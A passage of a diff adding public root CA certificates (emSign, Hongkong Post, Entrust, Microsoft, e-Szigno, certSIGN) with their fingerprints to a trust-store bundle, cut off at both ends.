30:43:fa:4f:f2:57:dc:a0:c3:80:ee:2e:58:ea:78:b2:3f:e6:bb:c1 +# SHA256 Fingerprint: 86:a1:ec:ba:08:9c:4a:8d:3b:be:27:34:c6:12:ba:34:1d:81:3e:04:3c:f9:e8:a8:62:cd:5c:57:a3:6b:be:6b +-----BEGIN CERTIFICATE----- +MIICTjCCAdOgAwIBAgIKPPYHqWhwDtqLhDAKBggqhkjOPQQDAzBrMQswCQYDVQQG +EwJJTjETMBEGA1UECxMKZW1TaWduIFBLSTElMCMGA1UEChMcZU11ZGhyYSBUZWNo +bm9sb2dpZXMgTGltaXRlZDEgMB4GA1UEAxMXZW1TaWduIEVDQyBSb290IENBIC0g +RzMwHhcNMTgwMjE4MTgzMDAwWhcNNDMwMjE4MTgzMDAwWjBrMQswCQYDVQQGEwJJ +TjETMBEGA1UECxMKZW1TaWduIFBLSTElMCMGA1UEChMcZU11ZGhyYSBUZWNobm9s +b2dpZXMgTGltaXRlZDEgMB4GA1UEAxMXZW1TaWduIEVDQyBSb290IENBIC0gRzMw +djAQBgcqhkjOPQIBBgUrgQQAIgNiAAQjpQy4LRL1KPOxst3iAhKAnjlfSU2fySU0 +WXTsuwYc58Byr+iuL+FBVIcUqEqy6HyC5ltqtdyzdc6LBtCGI79G1Y4PPwT01xyS +fvalY8L1X44uT6EYGQIrMgqCZH0Wk9GjQjBAMB0GA1UdDgQWBBR8XQKEE9TMipuB +zhccLikenEhjQjAOBgNVHQ8BAf8EBAMCAQYwDwYDVR0TAQH/BAUwAwEB/zAKBggq +hkjOPQQDAwNpADBmAjEAvvNhzwIQHWSVB7gYboiFBS+DCBeQyh+KTOgNG3qxrdWB +CUfvO6wIBHxcmbHtRwfSAjEAnbpV/KlK6O3t5nYBQnvI+GDZjVGLVTv7jHvrZQnD ++JbNR6iC8hZVdyR+EhCVBCyj +-----END CERTIFICATE----- + +# Issuer: CN=emSign Root CA - C1 O=eMudhra Inc OU=emSign PKI +# Subject: CN=emSign Root CA - C1 O=eMudhra Inc OU=emSign PKI +# Label: "emSign Root CA - C1" +# Serial: 825510296613316004955058 +# MD5 Fingerprint: d8:e3:5d:01:21:fa:78:5a:b0:df:ba:d2:ee:2a:5f:68 +# SHA1 Fingerprint: e7:2e:f1:df:fc:b2:09:28:cf:5d:d4:d5:67:37:b1:51:cb:86:4f:01 +# SHA256 Fingerprint: 12:56:09:aa:30:1d:a0:a2:49:b9:7a:82:39:cb:6a:34:21:6f:44:dc:ac:9f:39:54:b1:42:92:f2:e8:c8:60:8f +-----BEGIN CERTIFICATE----- +MIIDczCCAlugAwIBAgILAK7PALrEzzL4Q7IwDQYJKoZIhvcNAQELBQAwVjELMAkG +A1UEBhMCVVMxEzARBgNVBAsTCmVtU2lnbiBQS0kxFDASBgNVBAoTC2VNdWRocmEg +SW5jMRwwGgYDVQQDExNlbVNpZ24gUm9vdCBDQSAtIEMxMB4XDTE4MDIxODE4MzAw +MFoXDTQzMDIxODE4MzAwMFowVjELMAkGA1UEBhMCVVMxEzARBgNVBAsTCmVtU2ln +biBQS0kxFDASBgNVBAoTC2VNdWRocmEgSW5jMRwwGgYDVQQDExNlbVNpZ24gUm9v +dCBDQSAtIEMxMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAz+upufGZ +BczYKCFK83M0UYRWEPWgTywS4/oTmifQz/l5GnRfHXk5/Fv4cI7gklL35CX5VIPZ +HdPIWoU/Xse2B+4+wM6ar6xWQio5JXDWv7V7Nq2s9nPczdcdioOl+yuQFTdrHCZH +3DspVpNqs8FqOp099cGXOFgFixwR4+S0uF2FHYP+eF8LRWgYSKVGczQ7/g/IdrvH +GPMF0Ybzhe3nudkyrVWIzqa2kbBPrH4VI5b2P/AgNBbeCsbEBEV5f6f9vtKppa+c +xSMq9zwhbL2vj07FOrLzNBL834AaSaTUqZX3noleoomslMuoaJuvimUnzYnu3Yy1 +aylwQ6BpC+S5DwIDAQABo0IwQDAdBgNVHQ4EFgQU/qHgcB4qAzlSWkK+XJGFehiq +TbUwDgYDVR0PAQH/BAQDAgEGMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQEL +BQADggEBAMJKVvoVIXsoounlHfv4LcQ5lkFMOycsxGwYFYDGrK9HWS8mC+M2sO87 +/kOXSTKZEhVb3xEp/6tT+LvBeA+snFOvV71ojD1pM/CjoCNjO2RnIkSt1XHLVip4 +kqNPEjE2NuLe/gDEo2APJ62gsIq1NnpSob0n9CAnYuhNlCQT5AoE6TyrLshDCUrG +YQTlSTR+08TI9Q/Aqum6VF7zYytPT1DU/rl7mYw9wC68AivTxEDkigcxHpvOJpkT ++xHqmiIMERnHXhuBUDDIlhJu58tBf5E7oke3VIAb3ADMmpDqw8NQBmIMMMAVSKeo +WXzhriKi4gp6D/piq1JM4fHfyr6DDUI= +-----END CERTIFICATE----- + +# Issuer: CN=emSign ECC Root CA - C3 O=eMudhra Inc OU=emSign PKI +# Subject: CN=emSign ECC Root CA - C3 O=eMudhra Inc OU=emSign PKI +# Label: "emSign ECC Root CA - C3" +# Serial: 582948710642506000014504 +# MD5 Fingerprint: 3e:53:b3:a3:81:ee:d7:10:f8:d3:b0:1d:17:92:f5:d5 +# SHA1 Fingerprint: b6:af:43:c2:9b:81:53:7d:f6:ef:6b:c3:1f:1f:60:15:0c:ee:48:66 +# SHA256 Fingerprint: bc:4d:80:9b:15:18:9d:78:db:3e:1d:8c:f4:f9:72:6a:79:5d:a1:64:3c:a5:f1:35:8e:1d:db:0e:dc:0d:7e:b3 +-----BEGIN CERTIFICATE----- +MIICKzCCAbGgAwIBAgIKe3G2gla4EnycqDAKBggqhkjOPQQDAzBaMQswCQYDVQQG +EwJVUzETMBEGA1UECxMKZW1TaWduIFBLSTEUMBIGA1UEChMLZU11ZGhyYSBJbmMx +IDAeBgNVBAMTF2VtU2lnbiBFQ0MgUm9vdCBDQSAtIEMzMB4XDTE4MDIxODE4MzAw +MFoXDTQzMDIxODE4MzAwMFowWjELMAkGA1UEBhMCVVMxEzARBgNVBAsTCmVtU2ln +biBQS0kxFDASBgNVBAoTC2VNdWRocmEgSW5jMSAwHgYDVQQDExdlbVNpZ24gRUND +IFJvb3QgQ0EgLSBDMzB2MBAGByqGSM49AgEGBSuBBAAiA2IABP2lYa57JhAd6bci +MK4G9IGzsUJxlTm801Ljr6/58pc1kjZGDoeVjbk5Wum739D+yAdBPLtVb4Ojavti +sIGJAnB9SMVK4+kiVCJNk7tCDK93nCOmfddhEc5lx/h//vXyqaNCMEAwHQYDVR0O +BBYEFPtaSNCAIEDyqOkAB2kZd6fmw/TPMA4GA1UdDwEB/wQEAwIBBjAPBgNVHRMB +Af8EBTADAQH/MAoGCCqGSM49BAMDA2gAMGUCMQC02C8Cif22TGK6Q04ThHK1rt0c +3ta13FaPWEBaLd4gTCKDypOofu4SQMfWh0/434UCMBwUZOR8loMRnLDRWmFLpg9J +0wD8ofzkpf9/rdcw0Md3f76BB1UwUCAU9Vc4CqgxUQ== +-----END CERTIFICATE----- + +# Issuer: CN=Hongkong Post Root CA 3 O=Hongkong Post +# Subject: CN=Hongkong Post Root CA 3 O=Hongkong Post +# Label: "Hongkong Post Root CA 3" +# Serial: 46170865288971385588281144162979347873371282084 +# MD5 Fingerprint: 11:fc:9f:bd:73:30:02:8a:fd:3f:f3:58:b9:cb:20:f0 +# SHA1 Fingerprint: 58:a2:d0:ec:20:52:81:5b:c1:f3:f8:64:02:24:4e:c2:8e:02:4b:02 +# SHA256 Fingerprint: 5a:2f:c0:3f:0c:83:b0:90:bb:fa:40:60:4b:09:88:44:6c:76:36:18:3d:f9:84:6e:17:10:1a:44:7f:b8:ef:d6 +-----BEGIN CERTIFICATE----- +MIIFzzCCA7egAwIBAgIUCBZfikyl7ADJk0DfxMauI7gcWqQwDQYJKoZIhvcNAQEL +BQAwbzELMAkGA1UEBhMCSEsxEjAQBgNVBAgTCUhvbmcgS29uZzESMBAGA1UEBxMJ +SG9uZyBLb25nMRYwFAYDVQQKEw1Ib25na29uZyBQb3N0MSAwHgYDVQQDExdIb25n +a29uZyBQb3N0IFJvb3QgQ0EgMzAeFw0xNzA2MDMwMjI5NDZaFw00MjA2MDMwMjI5 +NDZaMG8xCzAJBgNVBAYTAkhLMRIwEAYDVQQIEwlIb25nIEtvbmcxEjAQBgNVBAcT +CUhvbmcgS29uZzEWMBQGA1UEChMNSG9uZ2tvbmcgUG9zdDEgMB4GA1UEAxMXSG9u +Z2tvbmcgUG9zdCBSb290IENBIDMwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIK +AoICAQCziNfqzg8gTr7m1gNt7ln8wlffKWihgw4+aMdoWJwcYEuJQwy51BWy7sFO +dem1p+/l6TWZ5Mwc50tfjTMwIDNT2aa71T4Tjukfh0mtUC1Qyhi+AViiE3CWu4mI +VoBc+L0sPOFMV4i707mV78vH9toxdCim5lSJ9UExyuUmGs2C4HDaOym71QP1mbpV +9WTRYA6ziUm4ii8F0oRFKHyPaFASePwLtVPLwpgchKOesL4jpNrcyCse2m5FHomY +2vkALgbpDDtw1VAliJnLzXNg99X/NWfFobxeq81KuEXryGgeDQ0URhLj0mRiikKY +vLTGCAj4/ahMZJx2Ab0vqWwzD9g/KLg8aQFChn5pwckGyuV6RmXpwtZQQS4/t+Tt +bNe/JgERohYpSms0BpDsE9K2+2p20jzt8NYt3eEV7KObLyzJPivkaTv/ciWxNoZb +x39ri1UbSsUgYT2uy1DhCDq+sI9jQVMwCFk8mB13umOResoQUGC/8Ne8lYePl8X+ +l2oBlKN8W4UdKjk60FSh0Tlxnf0h+bV78OLgAo9uliQlLKAeLKjEiafv7ZkGL7YK +TE/bosw3Gq9HhS2KX8Q0NEwA/RiTZxPRN+ZItIsGxVd7GYYKecsAyVKvQv83j+Gj +Hno9UKtjBucVtT+2RTeUN7F+8kjDf8V1/peNRY8apxpyKBpADwIDAQABo2MwYTAP +BgNVHRMBAf8EBTADAQH/MA4GA1UdDwEB/wQEAwIBBjAfBgNVHSMEGDAWgBQXnc0e +i9Y5K3DTXNSguB+wAPzFYTAdBgNVHQ4EFgQUF53NHovWOStw01zUoLgfsAD8xWEw +DQYJKoZIhvcNAQELBQADggIBAFbVe27mIgHSQpsY1Q7XZiNc4/6gx5LS6ZStS6LG +7BJ8dNVI0lkUmcDrudHr9EgwW62nV3OZqdPlt9EuWSRY3GguLmLYauRwCy0gUCCk +MpXRAJi70/33MvJJrsZ64Ee+bs7Lo3I6LWldy8joRTnU+kLBEUx3XZL7av9YROXr +gZ6voJmtvqkBZss4HTzfQx/0TW60uhdG/H39h4F5ag0zD/ov+BS5gLNdTaqX4fnk +GMX41TiMJjz98iji7lpJiCzfeT2OnpA8vUFKOt1b9pq0zj8lMH8yfaIDlNDceqFS +3m6TjRgm/VWsvY+b0s+v54Ysyx8Jb6NvqYTUc79NoXQbTiNg8swOqn+knEwlqLJm +Ozj/2ZQw9nKEvmhVEA/GcywWaZMH/rFF7buiVWqw2rVKAiUnhde3t4ZEFolsgCs+ +l6mc1X5VTMbeRRAc6uk7nwNT7u56AQIWeNTowr5GdogTPyK7SBIdUgC0An4hGh6c +JfTzPV4e0hz5sy229zdcxsshTrD3mUcYhcErulWuBurQB7Lcq9CClnXO0lD+mefP +L5/ndtFhKvshuzHQqp9HpLIiyhY6UFfEW0NnxWViA0kB60PZ2Pierc+xYw5F9KBa +LJstxabArahH9CdMOA0uG0k7UvToiIMrVCjU8jVStDKDYmlkDJGcn5fqdBb9HxEG +mpv0 +-----END CERTIFICATE----- + +# Issuer: CN=Entrust Root Certification Authority - G4 O=Entrust, Inc. OU=See www.entrust.net/legal-terms/(c) 2015 Entrust, Inc. - for authorized use only +# Subject: CN=Entrust Root Certification Authority - G4 O=Entrust, Inc. OU=See www.entrust.net/legal-terms/(c) 2015 Entrust, Inc. - for authorized use only +# Label: "Entrust Root Certification Authority - G4" +# Serial: 289383649854506086828220374796556676440 +# MD5 Fingerprint: 89:53:f1:83:23:b7:7c:8e:05:f1:8c:71:38:4e:1f:88 +# SHA1 Fingerprint: 14:88:4e:86:26:37:b0:26:af:59:62:5c:40:77:ec:35:29:ba:96:01 +# SHA256 Fingerprint: db:35:17:d1:f6:73:2a:2d:5a:b9:7c:53:3e:c7:07:79:ee:32:70:a6:2f:b4:ac:42:38:37:24:60:e6:f0:1e:88 +-----BEGIN CERTIFICATE----- +MIIGSzCCBDOgAwIBAgIRANm1Q3+vqTkPAAAAAFVlrVgwDQYJKoZIhvcNAQELBQAw +gb4xCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1FbnRydXN0LCBJbmMuMSgwJgYDVQQL +Ex9TZWUgd3d3LmVudHJ1c3QubmV0L2xlZ2FsLXRlcm1zMTkwNwYDVQQLEzAoYykg +MjAxNSBFbnRydXN0LCBJbmMuIC0gZm9yIGF1dGhvcml6ZWQgdXNlIG9ubHkxMjAw +BgNVBAMTKUVudHJ1c3QgUm9vdCBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eSAtIEc0 +MB4XDTE1MDUyNzExMTExNloXDTM3MTIyNzExNDExNlowgb4xCzAJBgNVBAYTAlVT +MRYwFAYDVQQKEw1FbnRydXN0LCBJbmMuMSgwJgYDVQQLEx9TZWUgd3d3LmVudHJ1 +c3QubmV0L2xlZ2FsLXRlcm1zMTkwNwYDVQQLEzAoYykgMjAxNSBFbnRydXN0LCBJ +bmMuIC0gZm9yIGF1dGhvcml6ZWQgdXNlIG9ubHkxMjAwBgNVBAMTKUVudHJ1c3Qg +Um9vdCBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eSAtIEc0MIICIjANBgkqhkiG9w0B +AQEFAAOCAg8AMIICCgKCAgEAsewsQu7i0TD/pZJH4i3DumSXbcr3DbVZwbPLqGgZ +2K+EbTBwXX7zLtJTmeH+H17ZSK9dE43b/2MzTdMAArzE+NEGCJR5WIoV3imz/f3E +T+iq4qA7ec2/a0My3dl0ELn39GjUu9CH1apLiipvKgS1sqbHoHrmSKvS0VnM1n4j +5pds8ELl3FFLFUHtSUrJ3hCX1nbB76W1NhSXNdh4IjVS70O92yfbYVaCNNzLiGAM +C1rlLAHGVK/XqsEQe9IFWrhAnoanw5CGAlZSCXqc0ieCU0plUmr1POeo8pyvi73T +DtTUXm6Hnmo9RR3RXRv06QqsYJn7ibT/mCzPfB3pAqoEmh643IhuJbNsZvc8kPNX +wbMv9W3y+8qh+CmdRouzavbmZwe+LGcKKh9asj5XxNMhIWNlUpEbsZmOeX7m640A +2Vqq6nPopIICR5b+W45UYaPrL0swsIsjdXJ8ITzI9vF01Bx7owVV7rtNOzK+mndm +nqxpkCIHH2E6lr7lmk/MBTwoWdPBDFSoWWG9yHJM6Nyfh3+9nEg2XpWjDrk4JFX8 +dWbrAuMINClKxuMrLzOg2qOGpRKX/YAr2hRC45K9PvJdXmd0LhyIRyk0X+IyqJwl +N4y6mACXi0mWHv0liqzc2thddG5msP9E36EYxr5ILzeUePiVSj9/E15dWf10hkNj +c0kCAwEAAaNCMEAwDwYDVR0TAQH/BAUwAwEB/zAOBgNVHQ8BAf8EBAMCAQYwHQYD +VR0OBBYEFJ84xFYjwznooHFs6FRM5Og6sb9nMA0GCSqGSIb3DQEBCwUAA4ICAQAS +5UKme4sPDORGpbZgQIeMJX6tuGguW8ZAdjwD+MlZ9POrYs4QjbRaZIxowLByQzTS +Gwv2LFPSypBLhmb8qoMi9IsabyZIrHZ3CL/FmFz0Jomee8O5ZDIBf9PD3Vht7LGr +hFV0d4QEJ1JrhkzO3bll/9bGXp+aEJlLdWr+aumXIOTkdnrG0CSqkM0gkLpHZPt/ +B7NTeLUKYvJzQ85BK4FqLoUWlFPUa19yIqtRLULVAJyZv967lDtX/Zr1hstWO1uI +AeV8KEsD+UmDfLJ/fOPtjqF/YFOOVZ1QNBIPt5d7bIdKROf1beyAN/BYGW5KaHbw +H5Lk6rWS02FREAutp9lfx1/cH6NcjKF+m7ee01ZvZl4HliDtC3T7Zk6LERXpgUl+ +b7DUUH8i119lAg2m9IUe2K4GS0qn0jFmwvjO5QimpAKWRGhXxNUzzxkvFMSUHHuk +2fCfDrGA4tGeEWSpiBE6doLlYsKA2KSD7ZPvfC+QsDJMlhVoSFLUmQjAJOgc47Ol +IQ6SwJAfzyBfyjs4x7dtOvPmRLgOMWuIjnDrnBdSqEGULoe256YSxXXfW8AKbnuk +5F6G+TaU33fD6Q3AOfF5u0aOq0NZJ7cguyPpVkAh7DE9ZapD8j3fcEThuk0mEDuY +n/PIjhs4ViFqUZPTkcpG2om3PVODLAgfi49T3f+sHw== +-----END CERTIFICATE----- + +# Issuer: CN=Microsoft ECC Root Certificate Authority 2017 O=Microsoft Corporation +# Subject: CN=Microsoft ECC Root Certificate Authority 2017 O=Microsoft Corporation +# Label: "Microsoft ECC Root Certificate Authority 2017" +# Serial: 136839042543790627607696632466672567020 +# MD5 Fingerprint: dd:a1:03:e6:4a:93:10:d1:bf:f0:19:42:cb:fe:ed:67 +# SHA1 Fingerprint: 99:9a:64:c3:7f:f4:7d:9f:ab:95:f1:47:69:89:14:60:ee:c4:c3:c5 +# SHA256 Fingerprint: 35:8d:f3:9d:76:4a:f9:e1:b7:66:e9:c9:72:df:35:2e:e1:5c:fa:c2:27:af:6a:d1:d7:0e:8e:4a:6e:dc:ba:02 +-----BEGIN CERTIFICATE----- +MIICWTCCAd+gAwIBAgIQZvI9r4fei7FK6gxXMQHC7DAKBggqhkjOPQQDAzBlMQsw +CQYDVQQGEwJVUzEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMTYwNAYD +VQQDEy1NaWNyb3NvZnQgRUNDIFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5IDIw +MTcwHhcNMTkxMjE4MjMwNjQ1WhcNNDIwNzE4MjMxNjA0WjBlMQswCQYDVQQGEwJV +UzEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMTYwNAYDVQQDEy1NaWNy +b3NvZnQgRUNDIFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5IDIwMTcwdjAQBgcq +hkjOPQIBBgUrgQQAIgNiAATUvD0CQnVBEyPNgASGAlEvaqiBYgtlzPbKnR5vSmZR +ogPZnZH6thaxjG7efM3beaYvzrvOcS/lpaso7GMEZpn4+vKTEAXhgShC48Zo9OYb +hGBKia/teQ87zvH2RPUBeMCjVDBSMA4GA1UdDwEB/wQEAwIBhjAPBgNVHRMBAf8E +BTADAQH/MB0GA1UdDgQWBBTIy5lycFIM+Oa+sgRXKSrPQhDtNTAQBgkrBgEEAYI3 +FQEEAwIBADAKBggqhkjOPQQDAwNoADBlAjBY8k3qDPlfXu5gKcs68tvWMoQZP3zV +L8KxzJOuULsJMsbG7X7JNpQS5GiFBqIb0C8CMQCZ6Ra0DvpWSNSkMBaReNtUjGUB +iudQZsIxtzm6uBoiB078a1QWIP8rtedMDE2mT3M= +-----END CERTIFICATE----- + +# Issuer: CN=Microsoft RSA Root Certificate Authority 2017 O=Microsoft Corporation +# Subject: CN=Microsoft RSA Root Certificate Authority 2017 O=Microsoft Corporation +# Label: "Microsoft RSA Root Certificate Authority 2017" +# Serial: 40975477897264996090493496164228220339 +# MD5 Fingerprint: 10:ff:00:ff:cf:c9:f8:c7:7a:c0:ee:35:8e:c9:0f:47 +# SHA1 Fingerprint: 73:a5:e6:4a:3b:ff:83:16:ff:0e:dc:cc:61:8a:90:6e:4e:ae:4d:74 +# SHA256 Fingerprint: c7:41:f7:0f:4b:2a:8d:88:bf:2e:71:c1:41:22:ef:53:ef:10:eb:a0:cf:a5:e6:4c:fa:20:f4:18:85:30:73:e0 +-----BEGIN CERTIFICATE----- +MIIFqDCCA5CgAwIBAgIQHtOXCV/YtLNHcB6qvn9FszANBgkqhkiG9w0BAQwFADBl +MQswCQYDVQQGEwJVUzEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMTYw +NAYDVQQDEy1NaWNyb3NvZnQgUlNBIFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5 +IDIwMTcwHhcNMTkxMjE4MjI1MTIyWhcNNDIwNzE4MjMwMDIzWjBlMQswCQYDVQQG +EwJVUzEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMTYwNAYDVQQDEy1N +aWNyb3NvZnQgUlNBIFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5IDIwMTcwggIi +MA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDKW76UM4wplZEWCpW9R2LBifOZ +Nt9GkMml7Xhqb0eRaPgnZ1AzHaGm++DlQ6OEAlcBXZxIQIJTELy/xztokLaCLeX0 +ZdDMbRnMlfl7rEqUrQ7eS0MdhweSE5CAg2Q1OQT85elss7YfUJQ4ZVBcF0a5toW1 +HLUX6NZFndiyJrDKxHBKrmCk3bPZ7Pw71VdyvD/IybLeS2v4I2wDwAW9lcfNcztm +gGTjGqwu+UcF8ga2m3P1eDNbx6H7JyqhtJqRjJHTOoI+dkC0zVJhUXAoP8XFWvLJ +jEm7FFtNyP9nTUwSlq31/niol4fX/V4ggNyhSyL71Imtus5Hl0dVe49FyGcohJUc +aDDv70ngNXtk55iwlNpNhTs+VcQor1fznhPbRiefHqJeRIOkpcrVE7NLP8TjwuaG +YaRSMLl6IE9vDzhTyzMMEyuP1pq9KsgtsRx9S1HKR9FIJ3Jdh+vVReZIZZ2vUpC6 +W6IYZVcSn2i51BVrlMRpIpj0M+Dt+VGOQVDJNE92kKz8OMHY4Xu54+OU4UZpyw4K +UGsTuqwPN1q3ErWQgR5WrlcihtnJ0tHXUeOrO8ZV/R4O03QK0dqq6mm4lyiPSMQH ++FJDOvTKVTUssKZqwJz58oHhEmrARdlns87/I6KJClTUFLkqqNfs+avNJVgyeY+Q +W5g5xAgGwax/Dj0ApQIDAQABo1QwUjAOBgNVHQ8BAf8EBAMCAYYwDwYDVR0TAQH/ +BAUwAwEB/zAdBgNVHQ4EFgQUCctZf4aycI8awznjwNnpv7tNsiMwEAYJKwYBBAGC +NxUBBAMCAQAwDQYJKoZIhvcNAQEMBQADggIBAKyvPl3CEZaJjqPnktaXFbgToqZC +LgLNFgVZJ8og6Lq46BrsTaiXVq5lQ7GPAJtSzVXNUzltYkyLDVt8LkS/gxCP81OC +gMNPOsduET/m4xaRhPtthH80dK2Jp86519efhGSSvpWhrQlTM93uCupKUY5vVau6 +tZRGrox/2KJQJWVggEbbMwSubLWYdFQl3JPk+ONVFT24bcMKpBLBaYVu32TxU5nh +SnUgnZUP5NbcA/FZGOhHibJXWpS2qdgXKxdJ5XbLwVaZOjex/2kskZGT4d9Mozd2 +TaGf+G0eHdP67Pv0RR0Tbc/3WeUiJ3IrhvNXuzDtJE3cfVa7o7P4NHmJweDyAmH3 +pvwPuxwXC65B2Xy9J6P9LjrRk5Sxcx0ki69bIImtt2dmefU6xqaWM/5TkshGsRGR +xpl/j8nWZjEgQRCHLQzWwa80mMpkg/sTV9HB8Dx6jKXB/ZUhoHHBk2dxEuqPiApp +GWSZI1b7rCoucL5mxAyE7+WL85MB+GqQk2dLsmijtWKP6T+MejteD+eMuMZ87zf9 +dOLITzNy4ZQ5bb0Sr74MTnB8G2+NszKTc0QWbej09+CVgI+WXTik9KveCjCHk9hN +AHFiRSdLOkKEW39lt2c0Ui2cFmuqqNh7o0JMcccMyj6D5KbvtwEwXlGjefVwaaZB +RA+GsCyRxj3qrg+E +-----END CERTIFICATE----- + +# Issuer: CN=e-Szigno Root CA 2017 O=Microsec Ltd. +# Subject: CN=e-Szigno Root CA 2017 O=Microsec Ltd. +# Label: "e-Szigno Root CA 2017" +# Serial: 411379200276854331539784714 +# MD5 Fingerprint: de:1f:f6:9e:84:ae:a7:b4:21:ce:1e:58:7d:d1:84:98 +# SHA1 Fingerprint: 89:d4:83:03:4f:9e:9a:48:80:5f:72:37:d4:a9:a6:ef:cb:7c:1f:d1 +# SHA256 Fingerprint: be:b0:0b:30:83:9b:9b:c3:2c:32:e4:44:79:05:95:06:41:f2:64:21:b1:5e:d0:89:19:8b:51:8a:e2:ea:1b:99 +-----BEGIN CERTIFICATE----- +MIICQDCCAeWgAwIBAgIMAVRI7yH9l1kN9QQKMAoGCCqGSM49BAMCMHExCzAJBgNV +BAYTAkhVMREwDwYDVQQHDAhCdWRhcGVzdDEWMBQGA1UECgwNTWljcm9zZWMgTHRk +LjEXMBUGA1UEYQwOVkFUSFUtMjM1ODQ0OTcxHjAcBgNVBAMMFWUtU3ppZ25vIFJv +b3QgQ0EgMjAxNzAeFw0xNzA4MjIxMjA3MDZaFw00MjA4MjIxMjA3MDZaMHExCzAJ +BgNVBAYTAkhVMREwDwYDVQQHDAhCdWRhcGVzdDEWMBQGA1UECgwNTWljcm9zZWMg +THRkLjEXMBUGA1UEYQwOVkFUSFUtMjM1ODQ0OTcxHjAcBgNVBAMMFWUtU3ppZ25v +IFJvb3QgQ0EgMjAxNzBZMBMGByqGSM49AgEGCCqGSM49AwEHA0IABJbcPYrYsHtv +xie+RJCxs1YVe45DJH0ahFnuY2iyxl6H0BVIHqiQrb1TotreOpCmYF9oMrWGQd+H +Wyx7xf58etqjYzBhMA8GA1UdEwEB/wQFMAMBAf8wDgYDVR0PAQH/BAQDAgEGMB0G +A1UdDgQWBBSHERUI0arBeAyxr87GyZDvvzAEwDAfBgNVHSMEGDAWgBSHERUI0arB +eAyxr87GyZDvvzAEwDAKBggqhkjOPQQDAgNJADBGAiEAtVfd14pVCzbhhkT61Nlo +jbjcI4qKDdQvfepz7L9NbKgCIQDLpbQS+ue16M9+k/zzNY9vTlp8tLxOsvxyqltZ ++efcMQ== +-----END CERTIFICATE----- + +# Issuer: O=CERTSIGN SA OU=certSIGN ROOT CA G2 +# Subject: O=CERTSIGN SA OU=certSIGN ROOT CA G2 +# Label: "certSIGN Root CA G2" +# Serial: 313609486401300475190 +# MD5 Fingerprint: 8c:f1:75:8a:c6:19:cf:94:b7:f7:65:20:87:c3:97:c7 +# SHA1 Fingerprint: 26:f9:93:b4:ed:3d:28:27:b0:b9:4b:a7:e9:15:1d:a3:8d:92:e5:32 +# SHA256 Fingerprint: 65:7c:fe:2f:a7:3f:aa:38:46:25:71:f3:32:a2:36:3a:46:fc:e7:02:09:51:71:07:02:cd:fb:b6:ee:da:33:05 +-----BEGIN CERTIFICATE----- +MIIFRzCCAy+gAwIBAgIJEQA0tk7GNi02MA0GCSqGSIb3DQEBCwUAMEExCzAJBgNV +BAYTAlJPMRQwEgYDVQQKEwtDRVJUU0lHTiBTQTEcMBoGA1UECxMTY2VydFNJR04g +Uk9PVCBDQSBHMjAeFw0xNzAyMDYwOTI3MzVaFw00MjAyMDYwOTI3MzVaMEExCzAJ +BgNVBAYTAlJPMRQwEgYDVQQKEwtDRVJUU0lHTiBTQTEcMBoGA1UECxMTY2VydFNJ +R04gUk9PVCBDQSBHMjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAMDF +dRmRfUR0dIf+DjuW3NgBFszuY5HnC2/OOwppGnzC46+CjobXXo9X69MhWf05N0Iw +vlDqtg+piNguLWkh59E3GE59kdUWX2tbAMI5Qw02hVK5U2UPHULlj88F0+7cDBrZ +uIt4ImfkabBoxTzkbFpG583H+u/E7Eu9aqSs/cwoUe+StCmrqzWaTOTECMYmzPhp +n+Sc8CnTXPnGFiWeI8MgwT0PPzhAsP6CRDiqWhqKa2NYOLQV07YRaXseVO6MGiKs +cpc/I1mbySKEwQdPzH/iV8oScLumZfNpdWO9lfsbl83kqK/20U6o2YpxJM02PbyW +xPFsqa7lzw1uKA2wDrXKUXt4FMMgL3/7FFXhEZn91QqhngLjYl/rNUssuHLoPj1P +rCy7Lobio3aP5ZMqz6WryFyNSwb/EkaseMsUBzXgqd+L6a8VTxaJW732jcZZroiF +DsGJ6x9nxUWO/203Nit4ZoORUSs9/1F3dmKh7Gc+PoGD4FapUB8fepmrY7+EF3fx +DTvf95xhszWYijqy7DwaNz9+j5LP2RIUZNoQAhVB/0/E6xyjyfqZ90bp4RjZsbgy +LcsUDFDYg2WD7rlcz8sFWkz6GZdr1l0T08JcVLwyc6B49fFtHsufpaafItzRUZ6C +eWRgKRM+o/1Pcmqr4tTluCRVLERLiohEnMqE0yo7AgMBAAGjQjBAMA8GA1UdEwEB +/wQFMAMBAf8wDgYDVR0PAQH/BAQDAgEGMB0GA1UdDgQWBBSCIS1mxteg4BXrzkwJ +d8RgnlRuAzANBgkqhkiG9w0BAQsFAAOCAgEAYN4auOfyYILVAzOBywaK8SJJ6ejq +kX/GM15oGQOGO0MBzwdw5AgeZYWR5hEit/UCI46uuR59H35s5r0l1ZUa8gWmr4UC +b6741jH/JclKyMeKqdmfS0mbEVeZkkMR3rYzpMzXjWR91M08KCy0mpbqTfXERMQl +qiCA2ClV9+BB/AYm/7k29UMUA2Z44RGx2iBfRgB4ACGlHgAoYXhvqAEBj500mv/0 +OJD7uNGzcgbJceaBxXntC6Z58hMLnPddDnskk7RI24Zf3lCGeOdA5jGokHZwYa+c +NywRtYK3qq4kNFtyDGkNzVmf9nGvnAvRCjj5BiKDUyUM/FHE5r7iOZULJK2v0ZXk +ltd0ZGtxTgI8qoXzIKNDOXZbbFD+mpwUHmUUihW9o4JFWklWatKcsWMy5WHgUyIO +pwpJ6st+H6jiYoD2EEVSmAYY3qXNL3+q1Ok+CHLsIwMCPKaq2LxndD0UF/tUSxfj +03k9bWtJySgOLnRQvwzZRjoQhsmnP+mg7H/rpXdYaXHmgwo38oZJar55CJD2AhZk 